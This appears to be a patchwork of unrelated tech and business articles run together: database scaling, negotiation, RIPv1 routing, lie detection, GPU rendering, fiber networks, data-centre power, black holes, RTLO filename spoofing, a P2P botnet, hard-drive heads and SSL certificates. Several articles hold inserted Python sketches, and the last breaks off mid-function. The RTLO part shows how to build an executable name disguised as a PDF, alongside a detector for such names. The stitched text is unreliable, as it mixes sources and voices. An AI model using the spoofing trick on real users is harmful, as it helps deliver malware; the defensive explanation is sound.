input traditionally. To detect anomalies or safety issues early, data would need to be processed in near real time. Moreover, if sensors are creating a snapshot of data every minute, even a data table for a single measurement would have more than 500,000 rows after a year or five million rows in ten years. Without any built-in intelligence, each query would be forced to examine every row. As pointed out by Dr. Michael Stonebraker in “Data Torrents and Rivers” (IEEE SPECTRUM, September 2006), the overhead accruing from the multiuser switching and persistent storage processes of conventional RDBMSs is prohibitive and “A new class of system software … is required.” However, we’ve demonstrated that the overhead of conventional RDBMSs is not an inherent consequence of the relational data model, but only of their historical design limitations. Unfortunately, despite incredible maintenance burdens, laggard performance, and incompatibility with a growing portion of data that’s unstructured, we insist on using conventional RDBMSs for advanced analytics when it’s indelibly clear they will never be able to handle the real-time data feeds of the future. Despite the shortcomings of the current model, the majority of IT executives have great difficulty imagining a corporate database that’s not managed by a conventional RDBMS. Even as we hire a growing staff to manage the data and spend millions on hardware and software, we’re latched on to the 30-year old relational data model for applications far beyond their capabilities. I believe the proliferation of sensors may be what finally breaks the camel’s back. The volume, speed and accessibility requirements will be so incredibly high that an army of thousands of data managers could not even make a dent on structuring a database that houses street-level information from “smart cities” in an entire state. No conventional RDBMS will be able to process it at any price. 
We will have to learn a new trick – and it’s about time.
Introduction to Negotiation: A Primer for "Getting to Yes"

Negotiation is a dialogue intended to resolve disputes, to produce an agreement on courses of action, to bargain for individual or collective advantage, or to craft outcomes to satisfy various interests. It is the primary method of alternative dispute resolution. This white paper focuses primarily on the negotiation process, different negotiation styles, and the various elements of communication that affect the outcome, including: Negotiation Communications, Constructive Questioning, Communication Obstacles (and overcoming those obstacles), Challenging Negotiation Situations and "Traps," and, finally, completing Successful Negotiations, a.k.a. "Getting to Yes."

Negotiation is the process where two or more individuals offer and approve concessions to arrive at an accepted agreement. The negotiation process comprises steps you can take to achieve a productive and effective negotiation. The negotiation process contains these five steps:
1. OPEN the negotiation positively.
2. PRESENT an agenda and budget time for each topic.
3. DISCUSS items on the agenda.
4. REVIEW the agreement.
5. CLOSE the negotiation on a positive note.

Open the Negotiation Positively
Open the negotiation by establishing a positive environment. Welcome the other party and thank them for participating. Communicate to the other party the ideal conclusion for the negotiation, and communicate assurance that a mutually beneficial negotiation is going to happen.

Present an Agenda and Budget Time for Each Topic
Inform the other party that you have created an agenda for the negotiation, and ask whether they could review it. Once it is confirmed that the agenda is acceptable, ask the other party to help budget time for each item which needs to be discussed.

Discuss Items on the Agenda
Discuss the items on the agenda following the time line that was established. If there is difficulty agreeing on the time limits, then ask if you can revisit the item later. If the other party appears hesitant, then suggest a quick break to allow either side a moment to contemplate the matter.

Review the Agreement
When you and the other party are about to agree, ask for a couple of minutes to examine what has happened. This step is essential, because it enables you to step back from the negotiation and clear your thoughts. Additionally, it helps you to evaluate the terms that have been offered so that your decision isn't impulsive.

Close the Negotiation Positively
After discussing the items on the agenda, close the negotiation on a positive note. Even if you are unable to reach an agreement, it is important to maintain a good relationship. Stay clear of leaving any unresolved negativity that could make the other party hesitant to carry out future negotiations with you or your organization.

Negotiation styles are about how people interact with other people during a negotiation. For instance, one person's style could be accommodating while another person's might be competitive. When the participants' strengths work effectively together, the negotiation process can be efficient and effective for both parties. Alternately, when the negotiation styles of the parties involved in the negotiation clash, the process can be difficult, and either of the parties may depart from the negotiation process feeling disappointed.
Every negotiation style has weaknesses and strengths that can limit or boost the negotiation process; as a result, a negotiation is shaped not just by the individual style of each participant but also by the combination of styles of everyone active in the negotiation. The list below comprises five of the major negotiation styles.

The accommodating style is a passive model of negotiation. This model is most effective whenever targets are more crucial to the other party than they are to you. The accommodating style enables you to briefly forfeit your position for the chance to accomplish future favors. Whenever you select the accommodating style, you would rather develop a good relationship with the other party than accomplish all of your targets. When you believe your position is weaker compared to the other party's, then accommodation can potentially help you reach a short-term resolution. However, you should not consider accommodation when the target item holds higher importance for you or when you feel the other party is being untruthful, controlling, or deceitful. Letting the other party dominate can cause you dissatisfaction and future clashes with the other party. Any time you see the other party behaving inappropriately, work to talk through disparities to assure that both parties appreciate each other's point of view.

The avoidance style is another passive style of negotiation. Its lose-lose positioning inhibits useful communication between the negotiating parties. Avoidance can cause feelings of dissatisfaction and anxiety, in addition to limiting personal and organizational progression of longer-term relationships, given that it can impair the negotiation process.
Why Don't RIPv1 and IGRP Support Variable-Length Subnet Mask? The ability to specify a different subnet mask for the same network number on different subnets is called Variable-Length Subnet Masking (VLSM). RIPv1 and IGRP are classful protocols and are incapable of carrying subnet mask information in their updates. Before RIPv1 or IGRP sends out an update, it checks the subnet mask of the network that is about to be advertised against the mask of the outgoing interface; if VLSM is in use and the masks differ, the subnet gets dropped. Let's look at an example. Suppose Router 1 has three subnets of the major network 172.16.0.0 with two different masks (/24 and /30): 172.16.1.0/24 on Ethernet0, 172.16.2.0/30, and 172.16.3.0/30 on the Serial0 link to Router 2 (Router 1's Serial0 address is 172.16.3.1). Router 1 goes through the following steps before sending an update to Router 2. These steps are explained in more detail in Behavior of RIP and IGRP When Sending or Receiving Updates.
- First, Router 1 checks whether 172.16.1.0/24 is part of the same major net as 172.16.3.0/30, the network assigned to the interface that will be sourcing the update.
- It is, so Router 1 then checks whether 172.16.1.0/24 has the same subnet mask as 172.16.3.0/30.
- Since it doesn't, Router 1 drops the network and doesn't advertise the route.
- Router 1 now checks whether 172.16.2.0/30 is part of the same major net as 172.16.3.0/30.
- It is, so Router 1 then checks whether 172.16.2.0/30 has the same subnet mask as 172.16.3.0/30.
- Since it does, Router 1 advertises the network.
These checks mean that Router 1 includes only 172.16.2.0 in the update it sends to Router 2. Using the debug ip rip command, we can actually see the update sent by Router 1. It looks like this:
RIP: sending v1 update to 255.255.255.255 via Serial0 (172.16.3.1)
subnet 172.16.2.0, metric 1
Notice that only one subnet is included in the update. This results in the following entry in Router 2's routing table, displayed using the show ip route command:
172.16.0.0/30 is subnetted, 3 subnets
R       172.16.2.0 [120/1] via 172.16.3.1, Serial0
C       172.16.3.0 is directly connected, Serial0
C       172.16.4.0 is directly connected, Ethernet0
To avoid having subnets eliminated from routing updates, either use the same subnet mask over the entire RIPv1 network or use static routes for networks with different subnet masks.
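To make the decision rule concrete, here is a minimal Python sketch of the classful check described above (this illustrates the logic only; it is not Cisco IOS code, and the helper names and addresses are my own):

```python
import ipaddress

def classful_major_network(address):
    """Return the classful (Class A/B/C) major network an address falls in."""
    first_octet = int(str(address).split(".")[0])
    prefix = 8 if first_octet < 128 else 16 if first_octet < 192 else 24
    return ipaddress.ip_network(f"{address}/{prefix}", strict=False)

def ripv1_advertises(subnet, outgoing_subnet):
    """Advertise a subnet out an interface only if it is in a different major
    network (then it is sent as the classful summary) or if it shares both the
    major network and the mask of the outgoing interface."""
    subnet = ipaddress.ip_network(subnet)
    out = ipaddress.ip_network(outgoing_subnet)
    same_major = (classful_major_network(subnet.network_address) ==
                  classful_major_network(out.network_address))
    if not same_major:
        return True                               # summarized at the classful boundary
    return subnet.prefixlen == out.prefixlen      # VLSM subnets get dropped

# Serial0 toward Router 2 sits on 172.16.3.0/30, as in the example above.
for candidate in ("172.16.1.0/24", "172.16.2.0/30"):
    verdict = "advertised" if ripv1_advertises(candidate, "172.16.3.0/30") else "dropped"
    print(candidate, verdict)
```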
A company has discovered how to not just open the window to the soul via one’s eyes, but also accurately determine whether or not that soul is lying. For years, “polygraph” and “lie detector” have been synonymous. That’s because since 1939 the FBI has been using the polygraph — an instrument that monitors a person’s involuntary physiological reactions. Its accuracy is estimated to be between 65 and 85 percent. No other viable, proven solution to detect deception has emerged to join the polygraph, until now. Scientists at Converus have spent the last 10 years perfecting a noninvasive lie detection method called EyeDetect, which monitors eye behavior, making it the first deception detection product based on an ocular-motor deception test. Validation trials showed it 85 percent accurate. The exam only takes 30-40 minutes. “We deal with a lot of sensitive information where the potential for risk is very high,” said Vilash Poovala, co-founder and CTO of PayClip. developer of Clip — a card reader that enables users in Mexico to accept credit and debit card payments through their smartphones and tablets. “We need to make sure the people we hire can be trusted. Technology like EyeDetect that can effectively screen potential employees for previous issues with theft or fraud is long overdue.” Corruption and fraud is a $2.6 trillion worldwide problem annually, with businesses some of the hardest hit. For example, $400 million was recently stolen from Citigroup Inc.’s Mexico unit, Banamex. Converus will focus its initial efforts showing businesses how the EyeDetect technology, when used for pre-employment and periodic screening of existing employees, can help to more effectively manage risk and ensure workplace integrity.
At the Web 2.0 Summit in San Francisco this week, NVIDIA announced a GPU-powered 3D Web platform. Called the NVIDIA RealityServer, it consists of Tesla GPUs, rendering software and a Web service environment, all integrated into a platform designed to deliver photorealistic image streams via a cloud computing model. The new offering is yet another example of how the company intends to push its high-end GPUs into CPU territory. The basic idea behind RealityServer is to do all the heavy computation lifting of image rendering on the server side, such that photorealistic 3D content can be delivered interactively across the Web. That means mass-market devices from smart phones to desktops and everything in between can be used to do high-end imaging. Applications include architectural design, product design, manufacturing and apparel styling, as well as HPC visual applications in such areas as oil and gas, medical diagnostics, and scientific research. As a result, potential users span the entire population: consumers, artists, product designers, doctors, architects, engineers, and scientists. The big emphasis here is on photorealistic images. Generating such content is extremely compute intensive since the software must calculate the effects of light bouncing off the objects in a scene. Rendering a single photorealistic frame for a complex image can take a whole day on a typical CPU-based workstation. So unless one happens to own a deskside HPC machine (which may themselves contain NVIDIA GPUs), client-side processing is usually not able to deliver this interactive user experience. Significantly, NVIDIA is not yet claiming this can be used to deliver photorealistic animation. For that to happen, presumably gamers and graphics animators will have to wait until GPU horsepower increases to the point where real-time photorealistic animation is practical. Theoretically, someone could build a big enough GPU cluster to do this today (or with Fermi GPUs next year), but computing 60 photorealistic frames per second is not likely to be economically feasible in the near term. The critical 3D software component of RealityServer is iray, a photorealistic rendering technology developed by mental images, an NVIDIA subsidiary the company bought two years ago. The iray software is essentially a GPU-accelerated rendering mode of its flagship mental ray product. The iray software uses global illumination, which requires a lot more computational horsepower than garden variety ray-tracing (which usually only approximates global illumination or just uses direct illumination). True global illumination, however, blends the effect of direct and indirect light and will produce a much more refined image, almost indistinguishable from a photograph. Rolf Herken, founder, CEO and CTO of mental images, characterized iray as “the first physically correct renderer.” In this case, the quality of the image is dependent on the fidelity of the input data rather than the algorithm. The feature that makes this practical in a cloud environment is iray’s ability to scale across many GPUs. According to the iray FAQ (PDF), the software scales “completely linearly on a local system, almost linearly on RealityServer across multiple machines.” The RealityServer software itself encompasses the iray renderer as well as the rest of the software stack that turns 3D imaging into a Web service. OpenGL is also supported for situations where iray computation would be too slow to deliver interactive rendering. 
As one might suspect, RealityServer includes support for standard CAD and digital content creation formats and can run under both Linux or Windows. The hardware environment for RealityServer is NVIDIA’s new Tesla RS platform, which comes in medium (8-31 GPUs), large (32-99 GPUs), and extra-large (100-plus GPUs) configurations. The Tesla device was presumably used since the high-end graphics chip and the larger memory capacity is specifically aimed at big GPU computing workloads. The smallest RS configuration is aimed at workgroups (for example, a group of collaborating architects), while the largest configuration is designed for thousands of concurrent users. This is only a general guideline, since some applications, like medical or oil & gas imaging, require multiple GPUs per user, while others, such as online entertainment, can support many users with a just single GPU. NVIDIA is pointing interested parties who want to build RealityServer GPU server infrastructure to its OEM partners (which include HPC vendors Colfax, Appro, and Penguin Computing), but is not indicating which manufacturers are actually offering these configurations today. The RealityServer software itself will be available on Nov. 30, when a developer edition will be made available free of charge, including the right to deploy non-commercial applications. No mention was made of licensing RealityServer or iray for commercial applications. As far as who will end up offering RealityServer infrastructure, NVIDIA is hoping public cloud providers, like for example Amazon, will be interested in adding this capability into their offerings. Private GPU clouds are also on the table, and frankly, are the more likely scenario in the short term, since I’m guessing a critical mass of RealityServer applications will need to be developed for the big cloud providers to be interested. In the NVIDIA press release, there were a handful of comments from some initial RealityServer customers, including mydeco.com, SceneCaster, and Wichita State University’s Virtual Reality Center at the National Institute for Aviation Research. Undoubtably, there is more low-hanging fruit out there waiting to be picked. The ease of developing these RealityServer applications will likely portend the success of the business in general. Users, of course, may be squeamish about locking their software to a specific vendor’s platform, but with no competing offering currently on the market, the choice may become simple. And if NVIDIA supports RealityServer efforts in the same manner it is using to develop the CUDA ecosystem, the company may indeed have a winning model for GPU computing in the cloud.
Concept of FTTx
FTTx stands for "fiber to the x," where x can stand for H (home), B (building), C (curb), or even W (wireless). It is a relatively new approach in today's access networks. Compared to copper or digital radio, fiber's high bandwidth and low attenuation easily offset its higher cost, and installing fiber optics all the way to the home or the user's workplace has long been the goal of the fiber optic industry. With optical fiber running all the way to the subscriber, we can get unprecedented speeds for services at home such as teleworking, telemedicine, and online shopping. Precisely because the demand for bandwidth keeps spiraling upwards, FTTx technology has become both popular and, increasingly, imperative.
FTTx Enabling Technologies
Depending on where the fiber terminates, the common FTTx architectures include the following types:
1. FTTC: Fiber to the Curb (or Node, FTTN). Fiber to the curb brings fiber to the curb, or just down the street, close enough for the copper wiring already connecting the home to carry DSL (Digital Subscriber Line). FTTC bandwidth therefore depends on DSL performance, and that bandwidth declines over long copper runs from the node to the home. Though FTTC costs less than FTTH to install initially, it is limited by the quality of the copper wiring installed to or near the home and by the distance between the node and the home. Thus, in many developed regions, FTTC is now gradually being upgraded to FTTH.
2. FTTH Active Star Network. In a home-run active star network, one fiber is dedicated to each home. It is the simplest way to achieve fiber to the home and offers the maximum bandwidth and flexibility. However, this architecture generally costs more, because it requires electronics on each end and a dedicated fiber for every home.
3. FTTH PON (Passive Optical Network). This FTTH architecture consists of a passive optical network (PON) that allows several customers to share the same connection without any active components (i.e., components that generate or transform light through optical-electrical-optical conversion). The architecture usually needs a PON splitter. A PON splitter is bi-directional: signals can be sent downstream from the central office and broadcast to all users, and signals from the users can be sent upstream and combined onto one fiber to communicate with the central office. The PON splitter is an important passive component in FTTH networks. There are two main kinds of passive optical splitters: the traditional fused-type splitter, also known as an FBT coupler or FBT WDM optical splitter, which features a competitive price; and the PLC splitter, based on planar lightwave circuit (PLC) technology, which has a compact size and suits high-density applications. Because sharing cuts the cost of the links substantially, this is the architecture most often chosen. There are two major current PON standards: GPON (gigabit-capable PON) and EPON (Ethernet PON). The former, originally built on ATM protocols, in its latest incarnation uses a custom framing protocol, GEM, to carry IP traffic. EPON is based on the IEEE standard for Ethernet in the First Mile, targeting cheaper optical components and native use of Ethernet. In addition, there is BPON (broadband PON), which was the most widely deployed PON in the early days.
It also uses ATM as its protocol (BPON digital signals operate at ATM rates of 155, 622, and 1244 Mb/s).
Deploying FTTx largely means deploying fiber optic cable, and terminating that cable is an important part of the work. Splicing is one of the necessary steps of fiber optic termination. Fiber optic splicing includes fusion splicing and mechanical splicing; fusion splicing is now more widely used because of its good performance and ease of operation. Cleaving, polishing, and end-face cleaning are also important parts of termination. Besides these termination steps, good connectors, pigtails, a fiber terminal box (FTB), and the right tool kits are also essential parts of the job.
Testing and Commissioning the FTTx Network
Although FTTx reduces the cost of using fiber optics, its components can still be expensive compared to other networks, so it is necessary to test and commission the network to ensure it works well. Testing an FTTx network is similar to other outside plant (OSP) testing, but the splitter and WDM add complexity. The commonly used testers include:
VFL – A visual fault locator is a device that can locate breaks, bends, or cracks in the fiber glass. It can also locate faults within the OTDR dead zone and identify a fiber from one end to the other. Designed with an FC/SC/ST universal adapter, this red-light tester needs no additional adapters and can locate faults up to 10 km along the cable; it is compact, lightweight, and uses a red laser output.
Power Meter and Light Source – A power meter measures received signal power, while a light source launches modulated or unmodulated optical power into the fiber under test. The light source is usually used together with the power meter; the pair is an economical and efficient solution for fiber network work and the most straightforward way to measure fiber loss.
Optical Time Domain Reflectometer (OTDR) – An OTDR is an optoelectronic instrument used to characterize an optical fiber. It gives an overview of the whole system under test and can estimate fiber length and overall attenuation, including splice and mated-connector losses. It can also locate faults such as breaks and measure optical return loss. It is an expensive tester and requires more skill to use.
OCWR (Optical Continuous Wave Reflectometer) – An OCWR characterizes a fiber optic link by transmitting an unmodulated signal through the link and measuring the light scattered and reflected back to the input. It is useful for estimating component reflectance and link optical return loss.
Optical Fiber Scope – A fiber scope is used for inspecting fiber terminations, providing the most critical view of the fiber end faces. It allows visual inspection of the connector end face for irregularities such as scratches and dirt, with magnification up to 400x.
Doubtless, FTTx technology will continue to spread. As network speed requirements keep rising, FTTx keeps improving in both technology and cost savings, and next-generation PONs such as 10G GEPON and WDM PON will also play an important role in FTTx development.
Maybe one day we will enjoy FTTD, i.e., fiber to the desk, and with it a variety of modern network services.
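Because commissioning ultimately comes down to confirming that each subscriber drop receives enough optical power, a quick loss-budget check is a useful companion to the power meter. The sketch below is purely illustrative; the transmitter power, receiver sensitivity, and per-element losses are typical assumed values, not figures from this article:

```python
import math

TX_POWER_DBM = 3.0           # assumed transmitter launch power
RX_SENSITIVITY_DBM = -27.0   # assumed receiver sensitivity

def link_margin_db(fiber_km, split_ratio, connectors, splices,
                   fiber_loss_db_per_km=0.35, connector_loss_db=0.5,
                   splice_loss_db=0.1):
    """Remaining margin after fiber, connector, splice, and splitter losses."""
    splitter_loss = 3.5 * math.log2(split_ratio)   # ~3.5 dB per 1:2 split stage
    total_loss = (fiber_km * fiber_loss_db_per_km
                  + connectors * connector_loss_db
                  + splices * splice_loss_db
                  + splitter_loss)
    return TX_POWER_DBM - total_loss - RX_SENSITIVITY_DBM

# Example: 20 km of fiber, a 1:32 splitter, 4 connectors, 6 splices
print(f"link margin: {link_margin_db(20, 32, 4, 6):.1f} dB")
```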
Three-phase AC power is everywhere. Every major power generation and distribution system in the world uses some variation of it. The reason is simple: Three-phase power systems allow a utility to ship more power over smaller (and cheaper) wires than would be possible in a single-phase system. IT organizations should turn to it in their data centers' racks. As server gear has undergone relentless waves of miniaturization, with the contemporary equivalent of the behemoth rack servers of years ago now boiled down to a sub-rack-unit blade, the amount of compute capacity that can be delivered in a single cabinet has risen dramatically. However, so too has the amount of power that a single rack of modern servers can consume. Years ago, you might fit eight or nine of the most power-hungry servers into a rack and consume around 5kW in the process. Today, you can easily fit 50 or 60 in the same space -- some blade platforms allow twice that -- and consume more than 30kW in total. Why your data center's single-phase power can't do the job any longer The typical single-phase power distribution systems are ill-suited to these kinds of loads. For example, as you start to move beyond a fairly typical 30-amp high-voltage circuit, the conductors, plugs, and sockets required to supply ever-increasing amperages become heavier, more difficult to work with, and progressively more expensive. To continue reading, register here to become an Insider This story, "Data center power maxed out? Three-phase power to the rescue!" was originally published by InfoWorld.
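As a rough illustration of the arithmetic behind that claim (the 208 V and 30 A figures below are common North American examples, not numbers taken from this article), compare what a single-phase and a three-phase circuit can deliver at the same amperage:

```python
import math

def single_phase_kw(volts, amps, derate=0.8, power_factor=1.0):
    """Usable power on a single-phase circuit, assuming an 80% continuous-load derating."""
    return volts * amps * derate * power_factor / 1000

def three_phase_kw(volts_line_to_line, amps, derate=0.8, power_factor=1.0):
    """Usable power on a three-phase circuit: sqrt(3) x V(line-to-line) x I."""
    return math.sqrt(3) * volts_line_to_line * amps * derate * power_factor / 1000

print(f"30 A @ 208 V, single-phase: {single_phase_kw(208, 30):.1f} kW")   # ~5.0 kW
print(f"30 A @ 208 V, three-phase:  {three_phase_kw(208, 30):.1f} kW")   # ~8.6 kW
```

The same 30 A circuit delivers roughly 70 percent more usable power when wired as three-phase, which is exactly the headroom a dense rack needs.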
NASA's black-hole-hunting spacecraft NuSTAR hit its first major milestone, detecting 10 "supermassive" black holes. NASA reported on Thursday that those 10 finds are the first of what scientists hope will be hundreds of black hole discoveries. The 10 black holes detected are what NASA calls "gargantuan structures." The black holes are surrounded by thick disks of gas and lie at the hearts of distant galaxies between 0.3 billion and 11.4 billion light-years from Earth. A black hole is an area in space with such intense gravitational pull that matter, and even light, cannot escape it. "We found the black holes serendipitously," said David Alexander, a NuSTAR team member based in the Department of Physics at Durham University in England. "We were looking at known targets and spotted the black holes in the background of the images." The spacecraft, which consists of a telescope with a mast the length of a school bus, was launched into Earth orbit in June 2012. It's the first telescope capable of focusing high-energy X-ray light into detailed pictures. According to the space agency, by combining observations taken across the range of the X-ray spectrum, astronomers hope to crack unsolved mysteries of black holes, such as how many there are in the universe. The space telescope will make targeted surveys of areas of space in the hunt for more black holes, NASA said. However, scientists also intend to scan hundreds of other images that the telescope has taken in the hopes of finding black holes in the background. For instance, once NuSTAR spotted the first 10 black holes, scientists went back to study images taken by other telescopes, including NASA's Chandra X-ray Observatory and the European Space Agency's XMM-Newton satellite. Scientists found that images of the black holes had been caught by these other devices but weren't spotted without closer inspection. "We are getting closer to solving a mystery that began in 1962," Alexander said in a statement. "Back then, astronomers had noted a diffuse X-ray glow in the background of our sky but were unsure of its origin. Now, we know that distant supermassive black holes are sources of this light, but we need NuSTAR to help further detect and understand the black hole populations." This article, NASA's NuSTAR telescope detects images of 10 'supermassive' black holes, was originally published at Computerworld.com. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed . Her email address is email@example.com.
After my post about extensions, I received some requests to deal with another method of pretending to be a different type of file. If you have not read that article yet, it will prove helpful to do that first in order to better understand this post.
What is RTLO (aka RLO)? The method called RTLO, or RLO, abuses the mechanism built into Windows for handling languages that are written from right to left: the "right-to-left override". Let's say you want to use a right-to-left language, like Hebrew or Arabic, on a site that also contains a left-to-right language like English or French. In this case, you need bidirectional script support. Bidirectional script support is the capability of a computer system to correctly display bidirectional text. In HTML we can use the Unicode left-to-right mark &lrm; (U+200E) and right-to-left mark &rlm; (U+200F) to override the HTML bidirectional algorithm when it produces undesirable results.
How is RTLO being abused by malware writers? On systems that support Unicode filenames, RTLO can be used to spoof fake extensions. To do this, we need a hidden Unicode character in the file name that reverses the display order of the characters that follow it. Take, for example, a copy of HijackThis.exe that I renamed using RTLO: the last seven characters in the file name are displayed backwards because I inserted the RTLO character before those seven characters. As discussed in the previous article, assigning a matching icon to a file is a triviality for a programmer. So here we have an executable file that seems to have the PDF extension. Ironically, you will see straight through this deception if you are still running XP, since it does not support these file names: a square placeholder symbol shows where the Unicode RTLO character is placed. One way to catch these fakes on more modern versions of Windows is to set the "Change your view" slider to "Content". Set this way, you can see that the files are applications and not a PDF or jpg. This may be a good idea for your "Download" folder(s), so you can check whether you have downloaded what you expected to get.
Is the RTLO method actively being used? The technique has been known for quite a while and is starting to resurface. It is not only being used for filenames, by the way. A piece of malware known as Sirefef (which Malwarebytes Anti-Malware detects as Trojan.Agent.EC) uses the RTLO method to trick users into thinking that the entries it puts into the infected machine's registry are legitimate ones belonging to Google Update.
Does this have any effect on the detection of these files? No. Detection of a malicious file is never done by filename alone, so your AV and Malwarebytes Anti-Malware will still recognize these files if they have been added to their detections, no matter what they are called or how their names are written.
Summary: RTLO is used to fake extensions by writing part of the filename or other descriptions back to front. Although detection by your AV or Malwarebytes Anti-Malware is not altered in any way, this trick can deceive users at first glance.
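As a practical illustration (this is my own sketch, not a Malwarebytes tool), a few lines of Python are enough both to reproduce the trick and to scan a folder for file names that contain bidirectional override characters:

```python
import pathlib
import unicodedata

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE

# Build a demonstration name: in an RTL-aware UI it displays as "invoice_exe.pdf",
# but the real extension is .exe.
spoofed = "invoice_" + RLO + "fdp.exe"
print(repr(spoofed), "is displayed as:", spoofed)

BIDI_MARKS = {"\u200e", "\u200f", "\u202a", "\u202b", "\u202c", "\u202d", "\u202e"}

def suspicious_names(folder):
    """Yield file names that contain bidirectional marks or overrides."""
    for path in pathlib.Path(folder).iterdir():
        found = [unicodedata.name(ch) for ch in path.name if ch in BIDI_MARKS]
        if found:
            yield path.name, found

for name, marks in suspicious_names("."):   # point this at a Downloads folder
    print("suspicious:", repr(name), marks)
```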
The P2P network architecture enables the botnet to stay alive and gather information, even if portions of the network are shut down, observed Andrea Lelli in a Symantec blog. The new Zeus/Spye variant appears to have discarded the C&C server and to use a P2P network architecture exclusively. “This means that every peer in the botnet can act as a C&C server, while none of them really are one. Bots are now capable of downloading commands, configuration files, and executables from other bots – every compromised computer is capable of providing data to the other bots”, Lelli wrote. “We don’t yet know how the stolen data is communicated back to the attackers, but it’s possible that such data is routed through the peers until it reaches a drop zone controlled by the attackers”, she added. Law enforcement has been able to take down botnets in the past by shutting down the C&C servers. However, with a P2P network architecture, a botnet can avoid this single point of vulnerability. “If they managed to completely remove C&C servers then this can be considered a step towards strengthening the botnet. If it only operates through P2P, it becomes nearly impossible to track the guys behind it. Again, analysis is still ongoing, so we are working on uncovering this part of the mystery to figure out the full picture”, Lelli concluded.
In Gillware’s latest blog series, “Data Recovery 101″, our bloggers take a closer look at each of the different components of a hard drive and explain how they work, how they fail and how we recover the data from each failure situation. In this post, we’ll explore the read/write head assembly. Read/write heads are the tiny sensors (about 0.1 – 0.3mm tiny) that do just what their name implies: read data stored on the platters and write data to the platter surface. Although some hard drive configurations involve just a single read/write head, most modern drives involve multiple heads stacked together to form what is referred to as a head stack assembly. The number of heads depends on the storage capacity of the drive. Higher capacity drives have more heads than lower capacity drives. The head itself is little more than a tiny coil of copper. When reading data, the platters magnetic field induces an electrical current in the read/write head coil. This current is interpreted by the HDD’s controller as a binary 1 or 0. When writing data, the HDD controller sends current to the read/write coil which induces a magnetic field that alters the bits stored on the hard drive platter effectively “writing” data to the drive. How do the mechanics of read/write heads work? The read/write head is designed to behave like a very small wing. When the drive is running, the platters spin at thousands of revolutions per minute generating a significant amount of airflow inside the drive chassis. When this airflow impacts the heads, they lift just like an airplane lifts when it achieves enough airflow over its wings. In normal operation, the read/write head floats just 3-5 nanometers above the surface of the platters. When the HDD receives a read or a write command, the heads seek to the area(s) of the platter where to which the data is to be read or written. In older drives, head positioning was controlled by a servo motor moving the read/write assembly across the platter surface. Servo motors were phased out over the years because they were a bottleneck preventing HDDs from meeting the demands of the market in terms of performance and drive capacity. Servo motors were replaced as the head positioning component in HDDs with a much higher performance design commonly referred to as a moving coil motor. With this design, a coil of copper wire is attached to the end of the head stack assembly. The copper coil is sandwiched between two powerful magnets. When current is feed to the copper coil, a magnetic field is generated and the head stack is “pushed” and “pulled” to the correct position on the platter As you may have guessed, the read/write heads are a common failure point in hard drives. They are one of the hardest working components inside a hard drive and also one of the most delicate. This, coupled with the fact that they are operating just a few nanometers above the surface of the platters, means that, although not common, failures can and do occur. There are a number of different ways the heads can fail. For example, if the drive unexpectedly loses power due to an electrical surge, power outage or hard shut down, the cushion of air over the surface of the platters dissipates before the heads have a chance to repark properly. In this instance, known as a head crash, the heads can contact the delicate platter surface while they are still spinning, causing damage to the magnetic substrate on the surface of the platters where the data is stored, or damage to the heads themselves. 
Head crashes, and consequently head failures, can also be caused by dragging a laptop across a desk, dropping an external hard drive on the floor, or simply by mechanical fatigue or component wear. When heads fail, the HDD will often make a clicking sound, which is the result of the head stack assembly flying blindly from one extent of the platter to the other; when the heads encounter the head stop, they make the clicking noise. Recovering data from a hard drive with failed read/write heads may seem easy in theory: just swap the bad heads out for a working head stack and, voila, you're done. However, there are a number of challenges that make replacing failed read/write heads difficult:
- Finding correct donor heads: It can be difficult to find the right donor heads for the failed hard drive. All read/write heads are not created equal. Heads change from manufacturer to manufacturer and from model to model. Modern hard drives are so sophisticated and tightly calibrated that the heads from two drives made one after the other on the production line may not be compatible with one another. There are two key factors that make Gillware very successful when it comes to replacing read/write heads. First, we have thousands of hard drives in our parts inventory that we can take donor heads from. The more parts we have in our inventory, the more likely it is that we will find heads that closely resemble the heads we are looking to replace. Second, we have sophisticated techniques for tricking the patient drive (the drive from which we want to recover data) into accepting the heads from the donor drive. As we have already covered, just because we have a drive of the same make and model does not mean that the drive will accept and operate with the new donor heads. Just like the human body can reject a new organ, a hard drive can reject new components. Doctors get around this by administering anti-rejection drugs to the patient. Gillware can't use drugs, but we CAN manipulate the hard drive's firmware to accept the new parts. It may not like it and the performance will certainly be degraded, but when executed properly, data can be read and recovered.
- Damage to other components: If, in the process of the heads failing, there is damage to other parts of the drive (platter damage, electrical failures, motor failure), recovery can be made even more difficult. Especially in the case of platter damage, unless the damage is cleaned up or repaired, the replacement donor heads will inevitably meet the same fate as the original heads: they will be instantly killed.
- Risk of contaminants on platters: This is something to consider any time a hard drive is opened. Since the heads float just a few nanometers above the surface of the platters, even a single speck of dust or a fingerprint on the platters can have catastrophic results. Any invasive mechanical data recovery should be performed by reputable professionals in a dust-free ISO 5, Class 100 cleanroom facility.
To learn more… In the posts to come, you'll learn more about the other hard drive components we've mentioned (electrical components, firmware, and the spindle motor) and how they work together to create a fully functioning hard drive. Additionally, we'll show you what can go wrong with each of these components and how Gillware recovers data from different hard drive failure situations. Check out the videos below showing how the read/write heads work in action.
The videos show the read/write heads performing random reads inside a hard drive with the cover removed.
The Internet was created with the best human aspirations in mind. From its nascent and humble beginnings, the intention of the Internet was to create point-to-point communications linking people and machines at light speed. The value of knowledge increases when shared. However, as with most well-intentioned human aspirations, darker ones soon follow, and communications do not get a free pass. In the 21st century, and perhaps before, nation-states initiated advanced persistent threat (APT), distributed denial-of-service (DDoS), and other cyber-attacks with the intention of crippling or destroying services. The promise of the Internet therefore cannot be realized without trusted point-to-point communications. The foundation of trusted Internet communications is the Secure Sockets Layer (SSL) certificate, an encryption technology installed on Web servers that permits transmission of sensitive data through an encrypted connection. Using a public-key infrastructure (PKI), SSL certificates authenticate the end-user website and the endpoint server, making it difficult for those sites to be imitated or forged. SSL certificates are purchased from companies known as certificate authorities (CAs). Download this white paper to get insight on how to:
- Manage an SSL certificate throughout its entire life cycle
- Keep your website secure with as little friction for the organization as possible
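Managing the life cycle starts with knowing when each deployed certificate expires. As a minimal, generic sketch (the host name is just a placeholder and this is not taken from the white paper), Python's standard ssl module can report how long a server's certificate has left:

```python
import socket
import ssl
from datetime import datetime, timezone

def cert_days_remaining(host, port=443):
    """Connect over TLS and return the days until the server certificate expires."""
    context = ssl.create_default_context()   # validates the chain against system CAs
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
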